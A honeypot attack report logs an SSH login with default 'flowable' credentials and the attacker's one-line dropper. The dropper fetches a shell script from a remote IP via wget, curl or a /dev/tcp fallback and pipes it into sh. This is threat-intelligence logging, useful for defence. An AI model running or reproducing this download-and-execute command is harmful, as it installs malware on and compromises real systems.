Attack Report for Observation

Header

Time

2024/09/22, 20:26:39 (GMT)

Transaction ID

JDLWB4HQAQV2N2IA

Service

ssh

Location

NL (Netherlands)

Attacker

5.182.211.148

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content

5.182.211.148 client username 'flowable' and password 'flowable' entered
5.182.211.148 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate